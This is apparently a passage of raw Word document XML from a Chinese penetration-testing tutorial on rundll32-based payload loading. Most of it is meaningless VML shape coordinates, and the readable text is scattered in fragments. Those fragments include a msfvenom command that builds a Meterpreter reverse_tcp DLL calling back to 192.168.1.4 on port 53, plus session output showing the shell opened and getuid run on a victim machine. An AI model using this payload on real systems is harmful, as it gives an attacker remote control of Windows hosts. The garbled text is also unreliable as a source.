0,5202,11980,5202,11979,5202,11979,5202,11978,5202,11977,5202,11977,5202,11976,5202,11975,5202,11975,5202,11974,5202,11973,5202,11972,5202,11971,5202,11970,5202,11969,5202,11968,5202,11967,5202,11966,5202,11965,5202,11964,5202,11963,5202,11961,5202,11960,5202,11958,5202,11957,5202,11956,5202,11954,5202,11952,5202,11951,5202,11949,5202,11947,5202,11945,5202,11943,5202,11942,5202,11940,5202,11937,5202,11935,5202,11933,5202,11931,5202,11929,5202,11926,5202,11924,5202,11921,5202,11919,5202,11916,5202,11913,5202,11910,5202,11908,5202,11905,5202,11902,5202,11898,5202,11895,5202,11892,5202,11889,5202,11885,5202,11882,5202,11878,5202,11875,5202,11871,5202,11867,5202,11863,5202,11859,5202,11855,5202,11851,5202,11847,5202,11843,5202,11838,5202,11834,5202,11829,5202,11824,5202,11820,5202,11815,5202,11810,5202,11805,5202,11800,5202,11794,5202,11789,5202,11784,5202,11778,5202,11772,5202,11767,5202,11761,5202,11755,5202,11749,5202,11743,5202,11736,5202,11730e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:337.500pt;margin-top:585.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6750,11710" coordsize="130,270">
        <v:shape style="position:absolute;left:6750;top:11710;width:130;height:270" coordorigin="6750,11710" coordsize="130,270" path="m6762,11730l6762,11730,6762,11730,6762,11730,6762,11730,6762,11730,6762,11730,6762,11730,6762,11730,6762,11730,6762,11730,6762,11730,6763,11730,6763,11730,6763,11730,6763,11730,6763,11730,6763,11730,6763,11730,6763,11730,6763,11730,6763,11730,6763,11730,6763,11730,6763,11730,6763,11730,6764,11730,6764,11730,6764,11730,6764,11730,6764,11730,6764,11730,6765,11730,6765,11730,6765,11730,6765,11730,6765,11730,6766,11730,6766,11730,6766,11730,6767,11730,6767,11730,6767,11730,6768,11730,6768,11730,6768,11730,6769,11730,6769,11730,6770,11730,6770,11730,6771,11730,6771,11730,6772,11730,6772,11730,6773,11730,6774,11730,6774,11730,6775,11730,6776,11730,6776,11730,6777,11730,6778,11730,6779,11730,6779,11730,6780,11730,6781,11730,6782,11730,6783,11730,6784,11730,6785,11730,6786,11730,6787,11730,6788,11730,6789,11730,6790,11730,6791,11730,6792,11730,6794,11730,6795,11730,6796,11730,6798,11730,6799,11730,6800,11730,6802,11730,6803,11730,6805,11730,6806,11730,6808,11730,6809,11730,6811,11730,6813,11730,6814,11730,6816,11730,6818,11730,6820,11730,6822,11730,6823,11730,6825,11730,6827,11730,6829,11730,6832,11730,6834,11730,6836,11730,6838,11730,6840,11730,6843,11730,6845,11730,6847,11730,6850,11730,6852,11730,6855,11730,6857,11730,6860,11730,6863,11730,6865,11730,6868,11730,6871,11730,6874,11730,6877,11730,6879,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11730,6882,11731,6882,11731,6882,11731,6882,11731,6882,11731,6882,11731,6882,11732,6882,11732,6882,11732,6882,11732,6882,11733,6882,11733,6882,11733,6882,11734,6882,11734,6882,11734,6882,11735,6882,11735,6882,11736,6882,11736,6882,11737,6882,11738,6882,11738,6882,11739,6882,11740,6882,11740,6882,11741,6882,11742,6882,11743,6882,11744,6882,11745,6882,11746,6882,11747,6882,11748,6882,11749,6882,11750,6882,11751,6882,11752,6882,11754,6882,11755,6882,11756,6882,11758,6882,11759,6882,11761,6882,11763,6882,11764,6882,11766,6882,11768,6882,11770,6882,11771,6882,11773,6882,11775,6882,11778,6882,11780,6882,11782,6882,11784,6882,11786,6882,11789,6882,11791,6882,11794,6882,11796,6882,11799,6882,11802,6882,11805,6882,11807,6882,11810,6882,11813,6882,11816,6882,11820,6882,11823,6882,11826,6882,11830,6882,11833,6882,11837,6882,11840,6882,11844,6882,11848,6882,11852,6882,11856,6882,11860,6882,11864,6882,11868,6882,11872,6882,11877,6882,11881,6882,11886,6882,11891,6882,11895,6882,11900,6882,11905,6882,11910,6882,11915,6882,11921,6882,11926,6882,11931,6882,11937,6882,11943,6882,11948,6882,11954,6882,11960,6882,11966,6882,11972,6882,11979,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6882,11985,6881,11985,6881,11985,6881,11985,6881,11985,6881,11985,6881,11985,6881,11985,6880,11985,6880,11985,6880,11985,6880,11985,6879,11985,6879,11985,6879,11985,6879,11985,6878,11985,6878,11985,6878,11985,6877,11985,6877,11985,6876,11985,6876,11985,6876,11985,6875,11985,6875,11985,6874,11985,6874,11985,6873,11985,6872,11985,6872,11985,6871,11985,6871,11985,6870,11985,6869,11985,6869,11985,6868,11985,6867,11985,6866,11985,6865,11985,6865,11985,6864,11985,6863,11985,6862,11985,6861,11985,6860,11985,6859,11985,6858,11985,6857,11985,6856,11985,6855,11985,6854,11985,6852,11985,6851,11985,6850,11985,6849,11985,6847,11985,6846,11985,6845,11985,6843,11985,6842,11985,6840,11985,6839,11985,6837,11985,6836,11985,6834,11985,6832,11985,6831,11985,6829,11985,6827,11985,6825,11985,6823,11985,6821,11985,6819,11985,6817,11985,6815,11985,6813,11985,6811,11985,6809,11985,6807,11985,6805,11985,6802,11985,6800,11985,6798,11985,6795,11985,6793,11985,6790,11985,6788,11985,6785,11985,6782,11985,6780,11985,6777,11985,6774,11985,6771,11985,6768,11985,6765,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11985,6762,11984,6762,11984,6762,11984,6762,11984,6762,11984,6762,11984,6762,11983,6762,11983,6762,11983,6762,11983,6762,11982,6762,11982,6762,11982,6762,11981,6762,11981,6762,11981,6762,11980,6762,11980,6762,11979,6762,11979,6762,11978,6762,11977,6762,11977,6762,11976,6762,11975,6762,11975,6762,11974,6762,11973,6762,11972,6762,11971,6762,11970,6762,11969,6762,11968,6762,11967,6762,11966,6762,11965,6762,11964,6762,11963,6762,11961,6762,11960,6762,11958,6762,11957,6762,11956,6762,11954,6762,11952,6762,11951,6762,11949,6762,11947,6762,11945,6762,11943,6762,11942,6762,11940,6762,11937,6762,11935,6762,11933,6762,11931,6762,11929,6762,11926,6762,11924,6762,11921,6762,11919,6762,11916,6762,11913,6762,11910,6762,11908,6762,11905,6762,11902,6762,11898,6762,11895,6762,11892,6762,11889,6762,11885,6762,11882,6762,11878,6762,11875,6762,11871,6762,11867,6762,11863,6762,11859,6762,11855,6762,11851,6762,11847,6762,11843,6762,11838,6762,11834,6762,11829,6762,11824,6762,11820,6762,11815,6762,11810,6762,11805,6762,11800,6762,11794,6762,11789,6762,11784,6762,11778,6762,11772,6762,11767,6762,11761,6762,11755,6762,11749,6762,11743,6762,11736,6762,11730e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:169.500pt;margin-top:620.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3390,12410" coordsize="130,270">
        <v:shape style="position:absolute;left:3390;top:12410;width:130;height:270" coordorigin="3390,12410" coordsize="130,270" path="m3416,12435l3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3416,12435,3417,12435,3417,12435,3417,12435,3417,12435,3417,12435,3417,12435,3417,12435,3418,12435,3418,12435,3418,12435,3418,12435,3419,12435,3419,12435,3419,12435,3419,12435,3420,12435,3420,12435,3420,12435,3421,12435,3421,12435,3421,12435,3422,12435,3422,12435,3423,12435,3423,12435,3424,12435,3424,12435,3425,12435,3425,12435,3426,12435,3426,12435,3427,12435,3428,12435,3428,12435,3429,12435,3430,12435,3430,12435,3431,12435,3432,12435,3433,12435,3434,12435,3434,12435,3435,12435,3436,12435,3437,12435,3438,12435,3439,12435,3440,12435,3441,12435,3442,12435,3443,12435,3445,12435,3446,12435,3447,12435,3448,12435,3450,12435,3451,12435,3452,12435,3454,12435,3455,12435,3456,12435,3458,12435,3459,12435,3461,12435,3463,12435,3464,12435,3466,12435,3468,12435,3469,12435,3471,12435,3473,12435,3475,12435,3477,12435,3479,12435,3481,12435,3483,12435,3485,12435,3487,12435,3489,12435,3491,12435,3494,12435,3496,12435,3498,12435,3501,12435,3503,12435,3505,12435,3508,12435,3511,12435,3513,12435,3516,12435,3519,12435,3521,12435,3524,12435,3527,12435,3530,12435,3533,12435,3536,12435,3536,12435,3536,12435,3536,12435,3536,12435,3536,12435,3536,12435,3536,12435,3536,12435,3536,12435,3536,12435,3536,12435,3536,12435,3536,12436,3536,12436,3536,12436,3536,12436,3536,12436,3536,12436,3536,12436,3536,12436,3536,12436,3536,12437,3536,12437,3536,12437,3536,12437,3536,12438,3536,12438,3536,12438,3536,12439,3536,12439,3536,12439,3536,12440,3536,12440,3536,12441,3536,12441,3536,12442,3536,12442,3536,12443,3536,12444,3536,12444,3536,12445,3536,12446,3536,12446,3536,12447,3536,12448,3536,12449,3536,12450,3536,12451,3536,12452,3536,12453,3536,12454,3536,12455,3536,12457,3536,12458,3536,12459,3536,12460,3536,12462,3536,12463,3536,12465,3536,12466,3536,12468,3536,12470,3536,12471,3536,12473,3536,12475,3536,12477,3536,12479,3536,12481,3536,12483,3536,12485,3536,12487,3536,12489,3536,12492,3536,12494,3536,12497,3536,12499,3536,12502,3536,12504,3536,12507,3536,12510,3536,12513,3536,12516,3536,12519,3536,12522,3536,12525,3536,12528,3536,12532,3536,12535,3536,12538,3536,12542,3536,12546,3536,12549,3536,12553,3536,12557,3536,12561,3536,12565,3536,12569,3536,12573,3536,12578,3536,12582,3536,12587,3536,12591,3536,12596,3536,12601,3536,12606,3536,12611,3536,12616,3536,12621,3536,12626,3536,12631,3536,12637,3536,12642,3536,12648,3536,12654,3536,12660,3536,12666,3536,12672,3536,12678,3536,12684,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3536,12690,3535,12690,3535,12690,3535,12690,3535,12690,3535,12690,3535,12690,3535,12690,3535,12690,3535,12690,3535,12690,3535,12690,3534,12690,3534,12690,3534,12690,3534,12690,3534,12690,3533,12690,3533,12690,3533,12690,3533,12690,3532,12690,3532,12690,3532,12690,3532,12690,3531,12690,3531,12690,3531,12690,3530,12690,3530,12690,3529,12690,3529,12690,3528,12690,3528,12690,3527,12690,3527,12690,3526,12690,3526,12690,3525,12690,3525,12690,3524,12690,3523,12690,3523,12690,3522,12690,3521,12690,3520,12690,3520,12690,3519,12690,3518,12690,3517,12690,3516,12690,3515,12690,3514,12690,3513,12690,3512,12690,3511,12690,3510,12690,3509,12690,3508,12690,3507,12690,3506,12690,3505,12690,3503,12690,3502,12690,3501,12690,3499,12690,3498,12690,3496,12690,3495,12690,3494,12690,3492,12690,3490,12690,3489,12690,3487,12690,3486,12690,3484,12690,3482,12690,3480,12690,3478,12690,3477,12690,3475,12690,3473,12690,3471,12690,3469,12690,3467,12690,3465,12690,3462,12690,3460,12690,3458,12690,3456,12690,3453,12690,3451,12690,3449,12690,3446,12690,3444,12690,3441,12690,3438,12690,3436,12690,3433,12690,3430,12690,3427,12690,3425,12690,3422,12690,3419,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12690,3416,12689,3416,12689,3416,12689,3416,12689,3416,12689,3416,12688,3416,12688,3416,12688,3416,12687,3416,12687,3416,12687,3416,12686,3416,12686,3416,12685,3416,12685,3416,12684,3416,12684,3416,12683,3416,12683,3416,12682,3416,12681,3416,12681,3416,12680,3416,12679,3416,12678,3416,12678,3416,12677,3416,12676,3416,12675,3416,12674,3416,12673,3416,12671,3416,12670,3416,12669,3416,12668,3416,12667,3416,12665,3416,12664,3416,12662,3416,12661,3416,12659,3416,12658,3416,12656,3416,12654,3416,12653,3416,12651,3416,12649,3416,12647,3416,12645,3416,12643,3416,12641,3416,12638,3416,12636,3416,12634,3416,12631,3416,12629,3416,12627,3416,12624,3416,12621,3416,12619,3416,12616,3416,12613,3416,12610,3416,12607,3416,12604,3416,12601,3416,12597,3416,12594,3416,12591,3416,12587,3416,12584,3416,12580,3416,12576,3416,12573,3416,12569,3416,12565,3416,12561,3416,12556,3416,12552,3416,12548,3416,12543,3416,12539,3416,12534,3416,12530,3416,12525,3416,12520,3416,12515,3416,12510,3416,12505,3416,12500,3416,12494,3416,12489,3416,12483,3416,12478,3416,12472,3416,12466,3416,12460,3416,12454,3416,12448,3416,12442,3416,12435e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:223.500pt;margin-top:638.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4470,12770" coordsize="130,270">
        <v:shape style="position:absolute;left:4470;top:12770;width:130;height:270" coordorigin="4470,12770" coordsize="130,270" path="m4496,12795l4496,12795,4496,12795,4496,12795,4496,12795,4496,12795,4496,12795,4496,12795,4496,12795,4496,12795,4496,12795,4496,12795,4496,12795,4496,12795,4496,12795,4496,12795,4497,12795,4497,12795,4497,12795,4497,12795,4497,12795,4497,12795,4497,12795,4497,12795,4497,12795,4497,12795,4497,12795,4498,12795,4498,12795,4498,12795,4498,12795,4498,12795,4498,12795,4499,12795,4499,12795,4499,12795,4499,12795,4500,12795,4500,12795,4500,12795,4500,12795,4501,12795,4501,12795,4502,12795,4502,12795,4502,12795,4503,12795,4503,12795,4504,12795,4504,12795,4505,12795,4505,12795,4506,12795,4506,12795,4507,12795,4507,12795,4508,12795,4509,12795,4509,12795,4510,12795,4511,12795,4512,12795,4512,12795,4513,12795,4514,12795,4515,12795,4516,12795,4517,12795,4518,12795,4519,12795,4520,12795,4521,12795,4522,12795,4523,12795,4524,12795,4525,12795,4526,12795,4528,12795,4529,12795,4530,12795,4531,12795,4533,12795,4534,12795,4536,12795,4537,12795,4538,12795,4540,12795,4542,12795,4543,12795,4545,12795,4546,12795,4548,12795,4550,12795,4552,12795,4554,12795,4555,12795,4557,12795,4559,12795,4561,12795,4563,12795,4565,12795,4568,12795,4570,12795,4572,12795,4574,12795,4576,12795,4579,12795,4581,12795,4584,12795,4586,12795,4589,12795,4591,12795,4594,12795,4596,12795,4599,12795,4602,12795,4605,12795,4607,12795,4610,12795,4613,12795,4616,12795,4616,12795,4616,12795,4616,12795,4616,12795,4616,12795,4616,12795,4616,12795,4616,12796,4616,12796,4616,12796,4616,12796,4616,12796,4616,12796,4616,12796,4616,12796,4616,12796,4616,12796,4616,12796,4616,12796,4616,12796,4616,12797,4616,12797,4616,12797,4616,12797,4616,12798,4616,12798,4616,12798,4616,12798,4616,12799,4616,12799,4616,12800,4616,12800,4616,12800,4616,12801,4616,12801,4616,12802,4616,12803,4616,12803,4616,12804,4616,12804,4616,12805,4616,12806,4616,12807,4616,12807,4616,12808,4616,12809,4616,12810,4616,12811,4616,12812,4616,12813,4616,12814,4616,12816,4616,12817,4616,12818,4616,12819,4616,12821,4616,12822,4616,12823,4616,12825,4616,12827,4616,12828,4616,12830,4616,12832,4616,12833,4616,12835,4616,12837,4616,12839,4616,12841,4616,12843,4616,12845,4616,12847,4616,12850,4616,12852,4616,12854,4616,12857,4616,12859,4616,12862,4616,12865,4616,12867,4616,12870,4616,12873,4616,12876,4616,12879,4616,12882,4616,12885,4616,12888,4616,12892,4616,12895,4616,12899,4616,12902,4616,12906,4616,12910,4616,12913,4616,12917,4616,12921,4616,12925,4616,12929,4616,12934,4616,12938,4616,12942,4616,12947,4616,12951,4616,12956,4616,12961,4616,12966,4616,12971,4616,12976,4616,12981,4616,12986,4616,12992,4616,12997,4616,13003,4616,13008,4616,13014,4616,13020,4616,13026,4616,13032,4616,13038,4616,13044,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4616,13051,4615,13051,4615,13051,4615,13051,4615,13051,4615,13051,4615,13051,4615,13051,4614,13051,4614,13051,4614,13051,4614,13051,4614,13051,4613,13051,4613,13051,4613,13051,4612,13051,4612,13051,4612,13051,4611,13051,4611,13051,4611,13051,4610,13051,4610,13051,4609,13051,4609,13051,4608,13051,4608,13051,4607,13051,4607,13051,4606,13051,4606,13051,4605,13051,4604,13051,4604,13051,4603,13051,4602,13051,4602,13051,4601,13051,4600,13051,4599,13051,4599,13051,4598,13051,4597,13051,4596,13051,4595,13051,4594,13051,4593,13051,4592,13051,4591,13051,4590,13051,4589,13051,4587,13051,4586,13051,4585,13051,4584,13051,4583,13051,4581,13051,4580,13051,4578,13051,4577,13051,4576,13051,4574,13051,4573,13051,4571,13051,4569,13051,4568,13051,4566,13051,4564,13051,4563,13051,4561,13051,4559,13051,4557,13051,4555,13051,4553,13051,4551,13051,4549,13051,4547,13051,4545,13051,4543,13051,4541,13051,4538,13051,4536,13051,4534,13051,4531,13051,4529,13051,4527,13051,4524,13051,4521,13051,4519,13051,4516,13051,4514,13051,4511,13051,4508,13051,4505,13051,4502,13051,4499,13051,4496,13051,4496,13051,4496,13051,4496,13051,4496,13051,4496,13051,4496,13051,4496,13051,4496,13051,4496,13050,4496,13050,4496,13050,4496,13050,4496,13050,4496,13050,4496,13050,4496,13050,4496,13050,4496,13050,4496,13050,4496,13050,4496,13049,4496,13049,4496,13049,4496,13049,4496,13048,4496,13048,4496,13048,4496,13048,4496,13047,4496,13047,4496,13046,4496,13046,4496,13046,4496,13045,4496,13045,4496,13044,4496,13044,4496,13043,4496,13042,4496,13042,4496,13041,4496,13040,4496,13039,4496,13039,4496,13038,4496,13037,4496,13036,4496,13035,4496,13034,4496,13033,4496,13032,4496,13030,4496,13029,4496,13028,4496,13027,4496,13025,4496,13024,4496,13023,4496,13021,4496,13019,4496,13018,4496,13016,4496,13014,4496,13013,4496,13011,4496,13009,4496,13007,4496,13005,4496,13003,4496,13001,4496,12999,4496,12996,4496,12994,4496,12992,4496,12989,4496,12987,4496,12984,4496,12981,4496,12979,4496,12976,4496,12973,4496,12970,4496,12967,4496,12964,4496,12961,4496,12958,4496,12954,4496,12951,4496,12947,4496,12944,4496,12940,4496,12936,4496,12933,4496,12929,4496,12925,4496,12921,4496,12917,4496,12912,4496,12908,4496,12904,4496,12899,4496,12895,4496,12890,4496,12885,4496,12880,4496,12875,4496,12870,4496,12865,4496,12860,4496,12855,4496,12849,4496,12844,4496,12838,4496,12832,4496,12826,4496,12820,4496,12814,4496,12808,4496,12802,4496,12795e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:169.500pt;margin-top:657.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3390,13150" coordsize="130,270">
        <v:shape style="position:absolute;left:3390;top:13150;width:130;height:270" coordorigin="3390,13150" coordsize="130,270" path="m3416,13171l3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3416,13171,3417,13171,3417,13171,3417,13171,3417,13171,3417,13171,3417,13171,3417,13171,3418,13171,3418,13171,3418,13171,3418,13171,3419,13171,3419,13171,3419,13171,3419,13171,3420,13171,3420,13171,3420,13171,3421,13171,3421,13171,3421,13171,3422,13171,3422,13171,3423,13171,3423,13171,3424,13171,3424,13171,3425,13171,3425,13171,3426,13171,3426,13171,3427,13171,3428,13171,3428,13171,3429,13171,3430,13171,3430,13171,3431,13171,3432,13171,3433,13171,3434,13171,3434,13171,3435,13171,3436,13171,3437,13171,3438,13171,3439,13171,3440,13171,3441,13171,3442,13171,3443,13171,3445,13171,3446,13171,3447,13171,3448,13171,3450,13171,3451,13171,3452,13171,3454,13171,3455,13171,3456,13171,3458,13171,3459,13171,3461,13171,3463,13171,3464,13171,3466,13171,3468,13171,3469,13171,3471,13171,3473,13171,3475,13171,3477,13171,3479,13171,3481,13171,3483,13171,3485,13171,3487,13171,3489,13171,3491,13171,3494,13171,3496,13171,3498,13171,3501,13171,3503,13171,3505,13171,3508,13171,3511,13171,3513,13171,3516,13171,3519,13171,3521,13171,3524,13171,3527,13171,3530,13171,3533,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13171,3536,13172,3536,13172,3536,13172,3536,13172,3536,13172,3536,13172,3536,13173,3536,13173,3536,13173,3536,13174,3536,13174,3536,13174,3536,13175,3536,13175,3536,13176,3536,13176,3536,13177,3536,13177,3536,13178,3536,13178,3536,13179,3536,13180,3536,13180,3536,13181,3536,13182,3536,13183,3536,13184,3536,13184,3536,13185,3536,13186,3536,13187,3536,13188,3536,13190,3536,13191,3536,13192,3536,13193,3536,13194,3536,13196,3536,13197,3536,13199,3536,13200,3536,13202,3536,13203,3536,13205,3536,13207,3536,13208,3536,13210,3536,13212,3536,13214,3536,13216,3536,13218,3536,13220,3536,13223,3536,13225,3536,13227,3536,13230,3536,13232,3536,13235,3536,13237,3536,13240,3536,13242,3536,13245,3536,13248,3536,13251,3536,13254,3536,13257,3536,13260,3536,13264,3536,13267,3536,13270,3536,13274,3536,13277,3536,13281,3536,13285,3536,13289,3536,13292,3536,13296,3536,13300,3536,13305,3536,13309,3536,13313,3536,13318,3536,13322,3536,13327,3536,13331,3536,13336,3536,13341,3536,13346,3536,13351,3536,13356,3536,13361,3536,13367,3536,13372,3536,13378,3536,13383,3536,13389,3536,13395,3536,13401,3536,13407,3536,13413,3536,13419,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3536,13426,3535,13426,3535,13426,3535,13426,3535,13426,3535,13426,3535,13426,3535,13426,3535,13426,3535,13426,3535,13426,3535,13426,3534,13426,3534,13426,3534,13426,3534,13426,3534,13426,3533,13426,3533,13426,3533,13426,3533,13426,3532,13426,3532,13426,3532,13426,3532,13426,3531,13426,3531,13426,3531,13426,3530,13426,3530,13426,3529,13426,3529,13426,3528,13426,3528,13426,3527,13426,3527,13426,3526,13426,3526,13426,3525,13426,3525,13426,3524,13426,3523,13426,3523,13426,3522,13426,3521,13426,3520,13426,3520,13426,3519,13426,3518,13426,3517,13426,3516,13426,3515,13426,3514,13426,3513,13426,3512,13426,3511,13426,3510,13426,3509,13426,3508,13426,3507,13426,3506,13426,3505,13426,3503,13426,3502,13426,3501,13426,3499,13426,3498,13426,3496,13426,3495,13426,3494,13426,3492,13426,3490,13426,3489,13426,3487,13426,3486,13426,3484,13426,3482,13426,3480,13426,3478,13426,3477,13426,3475,13426,3473,13426,3471,13426,3469,13426,3467,13426,3465,13426,3462,13426,3460,13426,3458,13426,3456,13426,3453,13426,3451,13426,3449,13426,3446,13426,3444,13426,3441,13426,3438,13426,3436,13426,3433,13426,3430,13426,3427,13426,3425,13426,3422,13426,3419,13426,3416,13426,3416,13426,3416,13426,3416,13426,3416,13426,3416,13426,3416,13426,3416,13426,3416,13426,3416,13426,3416,13426,3416,13426,3416,13426,3416,13426,3416,13425,3416,13425,3416,13425,3416,13425,3416,13425,3416,13425,3416,13425,3416,13425,3416,13424,3416,13424,3416,13424,3416,13424,3416,13423,3416,13423,3416,13423,3416,13422,3416,13422,3416,13422,3416,13421,3416,13421,3416,13420,3416,13420,3416,13419,3416,13419,3416,13418,3416,13417,3416,13417,3416,13416,3416,13415,3416,13415,3416,13414,3416,13413,3416,13412,3416,13411,3416,13410,3416,13409,3416,13408,3416,13407,3416,13406,3416,13404,3416,13403,3416,13402,3416,13401,3416,13399,3416,13398,3416,13396,3416,13395,3416,13393,3416,13391,3416,13390,3416,13388,3416,13386,3416,13384,3416,13382,3416,13380,3416,13378,3416,13376,3416,13374,3416,13372,3416,13369,3416,13367,3416,13364,3416,13362,3416,13359,3416,13357,3416,13354,3416,13351,3416,13348,3416,13345,3416,13342,3416,13339,3416,13336,3416,13333,3416,13329,3416,13326,3416,13323,3416,13319,3416,13315,3416,13312,3416,13308,3416,13304,3416,13300,3416,13296,3416,13292,3416,13288,3416,13283,3416,13279,3416,13274,3416,13270,3416,13265,3416,13260,3416,13255,3416,13251,3416,13245,3416,13240,3416,13235,3416,13230,3416,13224,3416,13219,3416,13213,3416,13207,3416,13201,3416,13196,3416,13189,3416,13183,3416,13177,3416,1317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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>于本地加载（2）：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p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ayload配置：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msfvenom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x86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‐‐platform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windows/meterpreter/reverse_tcp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LHOST=192.168.1.4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LPORT=53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‐f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dll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&gt;Micropoor_Rundll32.dll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1" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="551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Sending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stage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179779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bytes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.5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3590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session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63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opened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43320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04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34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0500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="12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6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getuid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username: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PC\John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getpid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70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pid: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6656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74.500pt;margin-top:317.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6350" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:6350;width:8990;height:690" coordorigin="1490,6350" coordsize="8990,690" path="m1510,6372l1510,6372,1510,6372,1510,6372,1510,6372,1510,6372,1510,6372,1511,6372,1512,6372,1512,6372,1514,6372,1515,6372,1517,6372,1519,6372,1521,6372,1524,6372,1528,6372,1532,6372,1536,6372,1541,6372,1546,6372,1552,6372,1559,6372,1566,6372,1575,6372,1583,6372,1593,6372,1603,6372,1615,6372,1627,6372,1640,6372,1654,6372,1668,6372,1684,6372,1701,6372,1719,6372,1738,6372,1758,6372,1780,6372,1802,6372,1826,6372,1851,6372,1877,6372,1904,6372,1933,6372,1963,6372,1995,6372,2028,6372,2063,6372,2099,6372,2136,6372,2175,6372,2216,6372,2259,6372,2303,6372,2348,6372,2396,6372,2445,6372,2496,6372,2549,6372,2604,6372,2660,6372,2719,6372,2779,6372,2841,6372,2906,6372,2972,6372,3041,6372,3112,6372,3184,6372,3259,6372,3336,6372,3416,6372,3498,6372,3582,6372,3668,6372,3757,6372,3848,6372,3941,6372,4037,6372,4136,6372,4236,6372,4340,6372,4446,6372,4555,6372,4666,6372,4780,6372,4897,6372,5017,6372,5139,6372,5264,6372,5392,6372,5523,6372,5657,6372,5793,6372,5933,6372,6076,6372,6222,6372,6370,6372,6522,6372,6677,6372,6835,6372,6997,6372,7161,6372,7329,6372,7500,6372,7675,6372,7853,6372,8034,6372,8219,6372,8407,6372,8598,6372,8793,6372,8992,6372,9194,6372,9400,6372,9609,6372,9823,6372,10039,6372,10260,6372,10484,6372,10484,6372,10484,6372,10484,6372,10484,6372,10484,6372,10484,6372,10484,6372,10484,6372,10484,6372,10484,6372,10484,6373,10484,6373,10484,6373,10484,6373,10484,6373,10484,6374,10484,6374,10484,6374,10484,6375,10484,6375,10484,6375,10484,6376,10484,6376,10484,6377,10484,6378,10484,6378,10484,6379,10484,6380,10484,6381,10484,6382,10484,6383,10484,6384,10484,6385,10484,6387,10484,6388,10484,6389,10484,6391,10484,6393,10484,6394,10484,6396,10484,6398,10484,6400,10484,6402,10484,6404,10484,6406,10484,6409,10484,6411,10484,6414,10484,6417,10484,6419,10484,6422,10484,6425,10484,6429,10484,6432,10484,6435,10484,6439,10484,6443,10484,6446,10484,6450,10484,6455,10484,6459,10484,6463,10484,6468,10484,6472,10484,6477,10484,6482,10484,6487,10484,6493,10484,6498,10484,6504,10484,6510,10484,6516,10484,6522,10484,6528,10484,6535,10484,6541,10484,6548,10484,6555,10484,6562,10484,6570,10484,6577,10484,6585,10484,6593,10484,6601,10484,6610,10484,6618,10484,6627,10484,6636,10484,6645,10484,6655,10484,6664,10484,6674,10484,6684,10484,6695,10484,